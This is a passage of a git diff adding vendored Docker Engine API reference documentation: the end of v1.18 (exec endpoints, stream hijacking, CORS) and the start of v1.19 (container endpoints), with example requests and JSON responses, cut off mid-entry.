+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such exec instance
+
+**Stream details**:
+
+Similar to the stream behavior of `POST /containers/(id or name)/attach` API
+
+#### Exec Resize
+
+`POST /exec/(id)/resize`
+
+Resizes the `tty` session used by the `exec` command `id`.  The unit is number of characters.
+This API is valid only if `tty` was specified as part of creating and starting the `exec` command.
+
+**Example request**:
+
+    POST /v1.18/exec/e90e34656806/resize?h=40&w=80 HTTP/1.1
+    Content-Type: text/plain
+
+**Example response**:
+
+    HTTP/1.1 201 Created
+    Content-Type: text/plain
+
+**Query parameters**:
+
+-   **h** – height of `tty` session
+-   **w** – width
+
+**Status codes**:
+
+-   **201** – no error
+-   **404** – no such exec instance
+
+#### Exec Inspect
+
+`GET /exec/(id)/json`
+
+Return low-level information about the `exec` command `id`.
+
+**Example request**:
+
+    GET /v1.18/exec/11fb006128e8ceb3942e7c58d77750f24210e35f879dd204ac975c184b820b39/json HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: plain/text
+
+    {
+      "ID" : "11fb006128e8ceb3942e7c58d77750f24210e35f879dd204ac975c184b820b39",
+      "Running" : false,
+      "ExitCode" : 2,
+      "ProcessConfig" : {
+        "privileged" : false,
+        "user" : "",
+        "tty" : false,
+        "entrypoint" : "sh",
+        "arguments" : [
+          "-c",
+          "exit 2"
+        ]
+      },
+      "OpenStdin" : false,
+      "OpenStderr" : false,
+      "OpenStdout" : false,
+      "Container" : {
+        "State" : {
+          "Running" : true,
+          "Paused" : false,
+          "Restarting" : false,
+          "OOMKilled" : false,
+          "Pid" : 3650,
+          "ExitCode" : 0,
+          "Error" : "",
+          "StartedAt" : "2014-11-17T22:26:03.717657531Z",
+          "FinishedAt" : "0001-01-01T00:00:00Z"
+        },
+        "ID" : "8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c",
+        "Created" : "2014-11-17T22:26:03.626304998Z",
+        "Path" : "date",
+        "Args" : [],
+        "Config" : {
+          "Hostname" : "8f177a186b97",
+          "Domainname" : "",
+          "User" : "",
+          "AttachStdin" : false,
+          "AttachStdout" : false,
+          "AttachStderr" : false,
+          "PortSpecs": null,
+          "ExposedPorts" : null,
+          "Tty" : false,
+          "OpenStdin" : false,
+          "StdinOnce" : false,
+          "Env" : [ "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" ],
+          "Cmd" : [
+            "date"
+          ],
+          "Image" : "ubuntu",
+          "Volumes" : null,
+          "WorkingDir" : "",
+          "Entrypoint" : null,
+          "NetworkDisabled" : false,
+          "MacAddress" : "",
+          "OnBuild" : null,
+          "SecurityOpt" : null
+        },
+        "Image" : "5506de2b643be1e6febbf3b8a240760c6843244c41e12aa2f60ccbb7153d17f5",
+        "NetworkSettings" : {
+          "IPAddress" : "172.17.0.2",
+          "IPPrefixLen" : 16,
+          "MacAddress" : "02:42:ac:11:00:02",
+          "Gateway" : "172.17.42.1",
+          "Bridge" : "docker0",
+          "PortMapping" : null,
+          "Ports" : {}
+        },
+        "ResolvConfPath" : "/var/lib/docker/containers/8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c/resolv.conf",
+        "HostnamePath" : "/var/lib/docker/containers/8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c/hostname",
+        "HostsPath" : "/var/lib/docker/containers/8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c/hosts",
+        "LogPath": "/var/lib/docker/containers/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b-json.log",
+        "Name" : "/test",
+        "Driver" : "aufs",
+        "ExecDriver" : "native-0.2",
+        "MountLabel" : "",
+        "ProcessLabel" : "",
+        "AppArmorProfile" : "",
+        "RestartCount" : 0,
+        "Volumes" : {},
+        "VolumesRW" : {}
+      }
+    }
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such exec instance
+-   **500** - server error
+
+## 3. Going further
+
+### 3.1 Inside `docker run`
+
+As an example, the `docker run` command line makes the following API calls:
+
+- Create the container
+
+- If the status code is 404, it means the image doesn't exist:
+    - Try to pull it.
+    - Then, retry to create the container.
+
+- Start the container.
+
+- If you are not in detached mode:
+- Attach to the container, using `logs=1` (to have `stdout` and
+      `stderr` from the container's start) and `stream=1`
+
+- If in detached mode or only `stdin` is attached, display the container's id.
+
+### 3.2 Hijacking
+
+In this version of the API, `/attach`, uses hijacking to transport `stdin`,
+`stdout`, and `stderr` on the same socket.
+
+To hint potential proxies about connection hijacking, Docker client sends
+connection upgrade headers similarly to websocket.
+
+    Upgrade: tcp
+    Connection: Upgrade
+
+When Docker daemon detects the `Upgrade` header, it switches its status code
+from **200 OK** to **101 UPGRADED** and resends the same headers.
+
+This might change in the future.
+
+### 3.3 CORS Requests
+
+To set cross origin requests to the Engine API please give values to
+`--api-cors-header` when running Docker in daemon mode. Set * (asterisk) allows all,
+default or blank means CORS disabled
+
+    $ docker -d -H="192.168.1.9:2375" --api-cors-header="http://foo.bar"
diff --git a/vendor/github.com/docker/docker/docs/api/v1.19.md b/vendor/github.com/docker/docker/docs/api/v1.19.md
new file mode 100644
index 0000000000..a1a7280d3a
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/api/v1.19.md
@@ -0,0 +1,2238 @@
+---
+title: "Engine API v1.19"
+description: "API Documentation for Docker"
+keywords: "API, Docker, rcli, REST, documentation"
+redirect_from:
+- /engine/reference/api/docker_remote_api_v1.19/
+- /reference/api/docker_remote_api_v1.19/
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+## 1. Brief introduction
+
+ - The daemon listens on `unix:///var/run/docker.sock` but you can
+   [Bind Docker to another host/port or a Unix socket](../reference/commandline/dockerd.md#bind-docker-to-another-host-port-or-a-unix-socket).
+ - The API tends to be REST. However, for some complex commands, like `attach`
+   or `pull`, the HTTP connection is hijacked to transport `stdout`,
+   `stdin` and `stderr`.
+ - When the client API version is newer than the daemon's, these calls return an HTTP
+   `400 Bad Request` error message.
+
+## 2. Endpoints
+
+### 2.1 Containers
+
+#### List containers
+
+`GET /containers/json`
+
+List containers
+
+**Example request**:
+
+    GET /v1.19/containers/json?all=1&before=8dfafdbc3a40&size=1 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+         {
+                 "Id": "8dfafdbc3a40",
+                 "Names":["/boring_feynman"],
+                 "Image": "ubuntu:latest",
+                 "Command": "echo 1",
+                 "Created": 1367854155,
+                 "Status": "Exit 0",
+                 "Ports": [{"PrivatePort": 2222, "PublicPort": 3333, "Type": "tcp"}],
+                 "Labels": {
+                         "com.example.vendor": "Acme",
+                         "com.example.license": "GPL",
+                         "com.example.version": "1.0"
+                 },
+                 "SizeRw": 12288,
+                 "SizeRootFs": 0
+         },
+         {
+                 "Id": "9cd87474be90",
+                 "Names":["/coolName"],
+                 "Image": "ubuntu:latest",
+                 "Command": "echo 222222",
+                 "Created": 1367854155,
+                 "Status": "Exit 0",
+                 "Ports": [],
+                 "Labels": {},
+                 "SizeRw": 12288,
+                 "SizeRootFs": 0
+         },
+         {
+                 "Id": "3176a2479c92",
+                 "Names":["/sleepy_dog"],
+                 "Image": "ubuntu:latest",
+                 "Command": "echo 3333333333333333",
+                 "Created": 1367854154,
+                 "Status": "Exit 0",
+                 "Ports":[],
+                 "Labels": {},
+                 "SizeRw":12288,
+                 "SizeRootFs":0
+         },
+         {
+                 "Id": "4cb07b47f9fb",
+                 "Names":["/running_cat"],
+                 "Image": "ubuntu:latest",
+                 "Command": "echo 444444444444444444444444444444444",
+                 "Created": 1367854152,
+                 "Status": "Exit 0",
+                 "Ports": [],
+                 "Labels": {},
+                 "SizeRw": 12288,
+                 "SizeRootFs": 0
+         }
+    ]
+
+**Query parameters**:
+
+-   **all** – 1/True/true or 0/False/false, Show all containers.
+        Only running containers are shown by default (i.e., this defaults to false)
+-   **limit** – Show `limit` last created
+        containers, include non-running ones.
+-   **since** – Show only containers created since Id, include
+        non-running ones.
+-   **before** – Show only containers created before Id, include
+        non-running ones.
+-   **size** – 1/True/true or 0/False/false, Show the containers
+        sizes
+-   **filters** - a JSON encoded value of the filters (a `map[string][]string`) to process on the containers list. Available filters:
+  -   `exited=<int>`; -- containers with exit code of  `<int>` ;
+  -   `status=`(`restarting`|`running`|`paused`|`exited`)
+  -   `label=key` or `label="key=value"` of a container label
+
+**Status codes**:
+
+-   **200** – no error
+-   **400** – bad parameter
+-   **500** – server error
+
+#### Create a container
+
+`POST /containers/create`
+
+Create a container
+
+**Example request**:
+
+    POST /v1.19/containers/create HTTP/1.1
+    Content-Type: application/json
+
+    {
+           "Hostname": "",
+           "Domainname": "",
+           "User": "",
+           "AttachStdin": false,
+           "AttachStdout": true,
+           "AttachStderr": true,
+           "Tty": false,
+           "OpenStdin": false,
+           "StdinOnce": false,
+           "Env": [
+                   "FOO=bar",
+                   "BAZ=quux"
+           ],
+           "Cmd": [
+                   "date"
+           ],
+           "Entrypoint": null,
+           "Image": "ubuntu",
+           "Labels": {
+                   "com.example.vendor": "Acme",
+                   "com.example.license": "GPL",
+                   "com.example.version": "1.0"
+           },
+           "Volumes": {
+             "/volumes/data": {}
+           },
+           "WorkingDir": "",
+           "NetworkDisabled": false,
+           "MacAddress": "12:34:56:78:9a:bc",
+           "ExposedPorts": {
+                   "22/tcp": {}
+           },
+           "HostConfig": {
+             "Binds": ["/tmp:/tmp"],
+             "Links": ["redis3:redis"],
+             "LxcConf": {"lxc.utsname":"docker"},
+             "Memory": 0,
+             "MemorySwap": 0,
+             "CpuShares": 512,
+             "CpuPeriod": 100000,
+             "CpuQuota": 50000,
+             "CpusetCpus": "0,1",
+             "CpusetMems": "0,1",
+             "BlkioWeight": 300,
+             "OomKillDisable": false,
+             "PidMode": "",
+             "PortBindings": { "22/tcp": [{ "HostPort": "11022" }] },
+             "PublishAllPorts": false,
+             "Privileged": false,
+             "ReadonlyRootfs": false,
+             "Dns": ["8.8.8.8"],
+             "DnsSearch": [""],
+             "ExtraHosts": null,
+             "VolumesFrom": ["parent", "other:ro"],
+             "CapAdd": ["NET_ADMIN"],
+             "CapDrop": ["MKNOD"],
+             "RestartPolicy": { "Name": "", "MaximumRetryCount": 0 },
+             "NetworkMode": "bridge",
+             "Devices": [],
+             "Ulimits": [{}],
+             "LogConfig": { "Type": "json-file", "Config": {} },
+             "SecurityOpt": [],
+             "CgroupParent": ""
+          }
+      }
+
+**Example response**:
+
+      HTTP/1.1 201 Created
+      Content-Type: application/json
+
+      {
+           "Id":"e90e34656806",
+           "Warnings":[]
+      }
+
+**JSON parameters**:
+
+-   **Hostname** - A string value containing the hostname to use for the
+      container.
+-   **Domainname** - A string value containing the domain name to use
+      for the container.
+-   **User** - A string value specifying the user inside the container.
+-   **AttachStdin** - Boolean value, attaches to `stdin`.
+-   **AttachStdout** - Boolean value, attaches to `stdout`.
+-   **AttachStderr** - Boolean value, attaches to `stderr`.
+-   **Tty** - Boolean value, Attach standard streams to a `tty`, including `stdin` if it is not closed.
+-   **OpenStdin** - Boolean value, opens `stdin`,
+-   **StdinOnce** - Boolean value, close `stdin` after the 1 attached client disconnects.
+-   **Env** - A list of environment variables in the form of `["VAR=value", ...]`
+-   **Labels** - Adds a map of labels to a container. To specify a map: `{"key":"value", ... }`
+-   **Cmd** - Command to run specified as a string or an array of strings.
+-   **Entrypoint** - Set the entry point for the container as a string or an array
+      of strings.
+-   **Image** - A string specifying the image name to use for the container.
+-   **Volumes** - An object mapping mount point paths (strings) inside the
+      container to empty objects.
+-   **WorkingDir** - A string specifying the working directory for commands to
+      run in.
+-   **NetworkDisabled** - Boolean value, when true disables networking for the
+      container
+-   **ExposedPorts** - An object mapping ports to an empty object in the form of:
+      `"ExposedPorts": { "<port>/<tcp|udp>: {}" }`
+-   **HostConfig**
+    -   **Binds** – A list of bind-mounts for this container. Each item is a string in one of these forms:
+           + `host-src:container-dest` to bind-mount a host path into the
+             container. Both `host-src`, and `container-dest` must be an
+             _absolute_ path.
+           + `host-src:container-dest:ro` to make the bind-mount read-only
+             inside the container. Both `host-src`, and `container-dest` must be
+             an _absolute_ path.
+    -   **Links** - A list of links for the container. Each link entry should be
+          in the form of `container_name:alias`.
+    -   **LxcConf** - LXC specific configurations. These configurations only
+          work when using the `lxc` execution driver.
+    -   **Memory** - Memory limit in bytes.
+    -   **MemorySwap** - Total memory limit (memory + swap); set `-1` to enable unlimited swap.
+          You must use this with `memory` and make the swap value larger than `memory`.
+    -   **CpuShares** - An integer value containing the container's CPU Shares
+          (ie. the relative weight vs other containers).
+    -   **CpuPeriod** - The length of a CPU period in microseconds.
+    -   **CpuQuota** - Microseconds of CPU time that the container can get in a CPU period.
+    -   **CpusetCpus** - String value containing the `cgroups CpusetCpus` to use.
+    -   **CpusetMems** - Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems.
+    -   **BlkioWeight** - Block IO weight (relative weight) accepts a weight value between 10 and 1000.
+    -   **OomKillDisable** - Boolean value, whether to disable OOM Killer for the container or not.
+    -   **PidMode** - Set the PID (Process) Namespace mode for the container;
+          `"container:<name|id>"`: joins another container's PID namespace
+          `"host"`: use the host's PID namespace inside the container
+    -   **PortBindings** - A map of exposed container ports and the host port they
+          should map to. A JSON object in the form
+          `{ <port>/<protocol>: [{ "HostPort": "<port>" }] }`
+          Take note that `port` is specified as a string and not an integer value.
+    -   **PublishAllPorts** - Allocates a random host port for all of a container's
+          exposed ports. Specified as a boolean value.
+    -   **Privileged** - Gives the container full access to the host. Specified as
+          a boolean value.
+    -   **ReadonlyRootfs** - Mount the container's root filesystem as read only.
+          Specified as a boolean value.
+    -   **Dns** - A list of DNS servers for the container to use.
+    -   **DnsSearch** - A list of DNS search domains
+    -   **ExtraHosts** - A list of hostnames/IP mappings to add to the
+        container's `/etc/hosts` file. Specified in the form `["hostname:IP"]`.
+    -   **VolumesFrom** - A list of volumes to inherit from another container.
+          Specified in the form `<container name>[:<ro|rw>]`
+    -   **CapAdd** - A list of kernel capabilities to add to the container.
+    -   **Capdrop** - A list of kernel capabilities to drop from the container.
+    -   **RestartPolicy** – The behavior to apply when the container exits.  The
+            value is an object with a `Name` property of either `"always"` to
+            always restart or `"on-failure"` to restart only when the container
+            exit code is non-zero.  If `on-failure` is used, `MaximumRetryCount`
+            controls the number of times to retry before giving up.
+            The default is not to restart. (optional)
+            An ever increasing delay (double the previous delay, starting at 100mS)
+            is added before each restart to prevent flooding the server.
+    -   **NetworkMode** - Sets the networking mode for the container. Supported
+          values are: `bridge`, `host`, `none`, and `container:<name|id>`
+    -   **Devices** - A list of devices to add to the container specified as a JSON object in the
+      form
+          `{ "PathOnHost": "/dev/deviceName", "PathInContainer": "/dev/deviceName", "CgroupPermissions": "mrw"}`
+    -   **Ulimits** - A list of ulimits to set in the container, specified as
+          `{ "Name": <name>, "Soft": <soft limit>, "Hard": <hard limit> }`, for example:
+          `Ulimits: { "Name": "nofile", "Soft": 1024, "Hard": 2048 }`
+    -   **SecurityOpt**: A list of string values to customize labels for MLS
+        systems, such as SELinux.
+    -   **LogConfig** - Log configuration for the container, specified as a JSON object in the form
+          `{ "Type": "<driver_name>", "Config": {"key1": "val1"}}`.
+          Available types: `json-file`, `syslog`, `journald`, `none`.
+          `syslog` available options are: `address`.
+    -   **CgroupParent** - Path to `cgroups` under which the container's `cgroup` is created. If the path is not absolute, the path is considered to be relative to the `cgroups` path of the init process. Cgroups are created if they do not already exist.
+
+**Query parameters**:
+
+-   **name** – Assign the specified name to the container. Must
+    match `/?[a-zA-Z0-9_-]+`.
+
+**Status codes**:
+
+-   **201** – no error
+-   **400** – bad parameter
+-   **404** – no such container
+-   **406** – impossible to attach (container not running)
+-   **409** – conflict
+-   **500** – server error
+
+#### Inspect a container
+
+`GET /containers/(id or name)/json`
+
+Return low-level information on the container `id`
+
+**Example request**:
+
+      GET /v1.19/containers/4fa6e0f0c678/json HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+	{
+		"AppArmorProfile": "",
+		"Args": [
+			"-c",
+			"exit 9"
+		],
+		"Config": {
+			"AttachStderr": true,
+			"AttachStdin": false,
+			"AttachStdout": true,
+			"Cmd": [
+				"/bin/sh",
+				"-c",
+				"exit 9"
+			],
+			"Domainname": "",
+			"Entrypoint": null,
+			"Env": [
+				"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
+			],
+			"ExposedPorts": null,
+			"Hostname": "ba033ac44011",
+			"Image": "ubuntu",
+			"Labels": {
+				"com.example.vendor": "Acme",
+				"com.example.license": "GPL",
+				"com.example.version": "1.0"
+			},
+			"MacAddress": "",
+			"NetworkDisabled": false,
+			"OnBuild": null,
+			"OpenStdin": false,
+			"PortSpecs": null,
+			"StdinOnce": false,
+			"Tty": false,
+			"User": "",
+			"Volumes": null,
+			"WorkingDir": ""
+		},
+		"Created": "2015-01-06T15:47:31.485331387Z",
+		"Driver": "devicemapper",
+		"ExecDriver": "native-0.2",
+		"ExecIDs": null,
+		"HostConfig": {
+			"Binds": null,
+			"BlkioWeight": 0,
+			"CapAdd": null,
+			"CapDrop": null,
+			"ContainerIDFile": "",
+			"CpusetCpus": "",
+			"CpusetMems": "",
+			"CpuShares": 0,
+			"CpuPeriod": 100000,
+			"Devices": [],
+			"Dns": null,
+			"DnsSearch": null,
+			"ExtraHosts": null,
+			"IpcMode": "",
+			"Links": null,
+			"LxcConf": [],
+			"Memory": 0,
+			"MemorySwap": 0,
+			"OomKillDisable": false,
+			"NetworkMode": "bridge",
+			"PidMode": "",
+			"PortBindings": {},
+			"Privileged": false,
+			"ReadonlyRootfs": false,
+			"PublishAllPorts": false,
+			"RestartPolicy": {
+				"MaximumRetryCount": 2,
+				"Name": "on-failure"
+			},
+			"LogConfig": {
+				"Config": null,
+				"Type": "json-file"
+			},
+			"SecurityOpt": null,
+			"VolumesFrom": null,
+			"Ulimits": [{}]
+		},
+		"HostnamePath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hostname",
+		"HostsPath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hosts",
+		"LogPath": "/var/lib/docker/containers/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b-json.log",
+		"Id": "ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39",
+		"Image": "04c5d3b7b0656168630d3ba35d8889bd0e9caafcaeb3004d2bfbc47e7c5d35d2",
+		"MountLabel": "",
+		"Name": "/boring_euclid",
+		"NetworkSettings": {
+			"Bridge": "",
+			"Gateway": "",
+			"IPAddress": "",
+			"IPPrefixLen": 0,
+			"MacAddress": "",
+			"PortMapping": null,
+			"Ports": null
+		},
+		"Path": "/bin/sh",
+		"ProcessLabel": "",
+		"ResolvConfPath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/resolv.conf",
+		"RestartCount": 1,
+		"State": {
+			"Error": "",
+			"ExitCode": 9,
+			"FinishedAt": "2015-01-06T15:47:32.080254511Z",
+			"OOMKilled": false,
+			"Paused": false,
+			"Pid": 0,
+			"Restarting": false,
+			"Running": true,
+			"StartedAt": "2015-01-06T15:47:32.072697474Z"
+		},
+		"Volumes": {},
+		"VolumesRW": {}
+	}
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### List processes running inside a container
+
+`GET /containers/(id or name)/top`
+
+List processes running inside the container `id`. On Unix systems this
+is done by running the `ps` command. This endpoint is not
+supported on Windows.
+
+**Example request**:
+
+    GET /v1.19/containers/4fa6e0f0c678/top HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+       "Titles" : [
+         "UID", "PID", "PPID", "C", "STIME", "TTY", "TIME", "CMD"
+       ],
+       "Processes" : [
+         [
+           "root", "13642", "882", "0", "17:03", "pts/0", "00:00:00", "/bin/bash"
+         ],
+         [
+           "root", "13735", "13642", "0", "17:06", "pts/0", "00:00:00", "sleep 10"
+         ]
+       ]
+    }
+
+**Example request**:
+
+    GET /v1.19/containers/4fa6e0f0c678/top?ps_args=aux HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+      "Titles" : [
+        "USER","PID","%CPU","%MEM","VSZ","RSS","TTY","STAT","START","TIME","COMMAND"
+      ]
+      "Processes" : [
+        [
+          "root","13642","0.0","0.1","18172","3184","pts/0","Ss","17:03","0:00","/bin/bash"
+        ],
+        [
+          "root","13895","0.0","0.0","4348","692","pts/0","S+","17:15","0:00","sleep 10"
+        ]
+      ],
+    }
+
+**Query parameters**:
+
+-   **ps_args** – `ps` arguments to use (e.g., `aux`), defaults to `-ef`
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Get container logs
+
+`GET /containers/(id or name)/logs`
+
+Get `stdout` and `stderr` logs from the container ``id``
+
+> **Note**:
+> This endpoint works only for containers with the `json-file` or `journald` logging drivers.
+
+**Example request**:
+
+     GET /v1.19/containers/4fa6e0f0c678/logs?stderr=1&stdout=1&timestamps=1&follow=1&tail=10&since=1428990821 HTTP/1.1
+
+**Example response**:
+
+     HTTP/1.1 101 UPGRADED
+     Content-Type: application/vnd.docker.raw-stream
+     Connection: Upgrade
+     Upgrade: tcp
+
+     {% raw %}
+     {{ STREAM }}
+     {% endraw %}
+
+**Query parameters**:
+
+-   **follow** – 1/True/true or 0/False/false, return stream. Default `false`.
+-   **stdout** – 1/True/true or 0/False/false, show `stdout` log. Default `false`.
+-   **stderr** – 1/True/true or 0/False/false, show `stderr` log. Default `false`.
+-   **since** – UNIX timestamp (integer) to filter logs. Specifying a timestamp
+    will only output log-entries since that timestamp. Default: 0 (unfiltered)
+-   **timestamps** – 1/True/true or 0/False/false, print timestamps for
+        every log line. Default `false`.
+-   **tail** – Output specified number of lines at the end of logs: `all` or `<number>`. Default all.
+
+**Status codes**:
+
+-   **101** – no error, hints proxy about hijacking
+-   **200** – no error, no upgrade header found
+-   **404** – no such container
+-   **500** – server error
+
+#### Inspect changes on a container's filesystem
+
+`GET /containers/(id or name)/changes`
+
+Inspect changes on container `id`'s filesystem
+
+**Example request**:
+
+    GET /v1.19/containers/4fa6e0f0c678/changes HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+         {
+                 "Path": "/dev",
+                 "Kind": 0
+         },
+         {
+                 "Path": "/dev/kmsg",
+                 "Kind": 1
+         },
+         {
+                 "Path": "/test",
+                 "Kind": 1
+         }
+    ]
+
+Values for `Kind`:
+
+- `0`: Modify
+- `1`: Add
+- `2`: Delete
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Export a container
+
+`GET /containers/(id or name)/export`
+
+Export the contents of container `id`
+
+**Example request**:
+
+    GET /v1.19/containers/4fa6e0f0c678/export HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/octet-stream
+
+    {% raw %}
+    {{ TAR STREAM }}
+    {% endraw %}
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Get container stats based on resource usage
+
+`GET /containers/(id or name)/stats`
+
+This endpoint returns a live stream of a container's resource usage statistics.
+
+**Example request**:
+
+    GET /v1.19/containers/redis1/stats HTTP/1.1
+
+**Example response**:
+
+      HTTP/1.1 200 OK
+      Content-Type: application/json
+
+      {
+         "read" : "2015-01-08T22:57:31.547920715Z",
+         "network" : {
+            "rx_dropped" : 0,
+            "rx_bytes" : 648,
+            "rx_errors" : 0,
+            "tx_packets" : 8,
+            "tx_dropped" : 0,
+            "rx_packets" : 8,
+            "tx_errors" : 0,
+            "tx_bytes" : 648
+         },
+         "memory_stats" : {
+            "stats" : {
+               "total_pgmajfault" : 0,
+               "cache" : 0,
+               "mapped_file" : 0,
+               "total_inactive_file" : 0,
+               "pgpgout" : 414,
+               "rss" : 6537216,
+               "total_mapped_file" : 0,
+               "writeback" : 0,
+               "unevictable" : 0,
+               "pgpgin" : 477,
+               "total_unevictable" : 0,
+               "pgmajfault" : 0,
+               "total_rss" : 6537216,
+               "total_rss_huge" : 6291456,
+               "total_writeback" : 0,
+               "total_inactive_anon" : 0,
+               "rss_huge" : 6291456,
+               "hierarchical_memory_limit" : 67108864,
+               "total_pgfault" : 964,
+               "total_active_file" : 0,
+               "active_anon" : 6537216,
+               "total_active_anon" : 6537216,
+               "total_pgpgout" : 414,
+               "total_cache" : 0,
+               "inactive_anon" : 0,
+               "active_file" : 0,
+               "pgfault" : 964,
+               "inactive_file" : 0,
+               "total_pgpgin" : 477
+            },
+            "max_usage" : 6651904,
+            "usage" : 6537216,
+            "failcnt" : 0,
+            "limit" : 67108864
+         },
+         "blkio_stats" : {},
+         "cpu_stats" : {
+            "cpu_usage" : {
+               "percpu_usage" : [
+                  8646879,
+                  24472255,
+                  36438778,
+                  30657443
+               ],
+               "usage_in_usermode" : 50000000,
+               "total_usage" : 100215355,
+               "usage_in_kernelmode" : 30000000
+            },
+            "system_cpu_usage" : 739306590000000,
+            "throttling_data" : {"periods":0,"throttled_periods":0,"throttled_time":0}
+         },
+         "precpu_stats" : {
+            "cpu_usage" : {
+               "percpu_usage" : [
+                  8646879,
+                  24350896,
+                  36438778,
+                  30657443
+               ],
+               "usage_in_usermode" : 50000000,
+               "total_usage" : 100093996,
+               "usage_in_kernelmode" : 30000000
+            },
+            "system_cpu_usage" : 9492140000000,
+            "throttling_data" : {"periods":0,"throttled_periods":0,"throttled_time":0}
+         }
+      }
+
+The precpu_stats is the cpu statistic of last read, which is used for calculating the cpu usage percent. It is not the exact copy of the “cpu_stats” field.
+
+**Query parameters**:
+
+-   **stream** – 1/True/true or 0/False/false, pull stats once then disconnect. Default `true`.
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Resize a container TTY
+
+`POST /containers/(id or name)/resize?h=<height>&w=<width>`
+
+Resize the TTY for container with  `id`. You must restart the container for the resize to take effect.
+
+**Example request**:
+
+      POST /v1.19/containers/4fa6e0f0c678/resize?h=40&w=80 HTTP/1.1
+
+**Example response**:
+
+      HTTP/1.1 200 OK
+      Content-Length: 0
+      Content-Type: text/plain; charset=utf-8
+
+**Query parameters**:
+
+-   **h** – height of `tty` session
+-   **w** – width
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – No such container
+-   **500** – Cannot resize container
+
+#### Start a container
+
+`POST /containers/(id or name)/start`
+
+Start the container `id`
+
+> **Note**:
+> For backwards compatibility, this endpoint accepts a `HostConfig` as JSON-encoded request body.
+> See [create a container](#create-a-container) for details.
+
+**Example request**:
+
+    POST /v1.19/containers/e90e34656806/start HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Status codes**:
+
+-   **204** – no error
+-   **304** – container already started
+-   **404** – no such container
+-   **500** – server error
+
+#### Stop a container
+
+`POST /containers/(id or name)/stop`
+
+Stop the container `id`
+
+**Example request**:
+
+    POST /v1.19/containers/e90e34656806/stop?t=5 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Query parameters**:
+
+-   **t** – number of seconds to wait before killing the container
+
+**Status codes**:
+
+-   **204** – no error
+-   **304** – container already stopped
+-   **404** – no such container
+-   **500** – server error
+
+#### Restart a container
+
+`POST /containers/(id or name)/restart`
+
+Restart the container `id`
+
+**Example request**:
+
+    POST /v1.19/containers/e90e34656806/restart?t=5 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Query parameters**:
+
+-   **t** – number of seconds to wait before killing the container
+
+**Status codes**:
+
+-   **204** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Kill a container
+
+`POST /containers/(id or name)/kill`
+
+Kill the container `id`
+
+**Example request**:
+
+    POST /v1.19/containers/e90e34656806/kill HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Query parameters**:
+
+-   **signal** - Signal to send to the container: integer or string like `SIGINT`.
+        When not set, `SIGKILL` is assumed and the call waits for the container to exit.
+
+**Status codes**:
+
+-   **204** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Rename a container
+
+`POST /containers/(id or name)/rename`
+
+Rename the container `id` to a `new_name`
+
+**Example request**:
+
+    POST /v1.19/containers/e90e34656806/rename?name=new_name HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Query parameters**:
+
+-   **name** – new name for the container
+
+**Status codes**:
+
+-   **204** – no error
+-   **404** – no such container
+-   **409** - conflict name already assigned
+-   **500** – server error
+
+#### Pause a container
+
+`POST /containers/(id or name)/pause`
+
+Pause the container `id`
+
+**Example request**:
+
+    POST /v1.19/containers/e90e34656806/pause HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Status codes**:
+
+-   **204** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Unpause a container
+
+`POST /containers/(id or name)/unpause`
+
+Unpause the container `id`
+
+**Example request**:
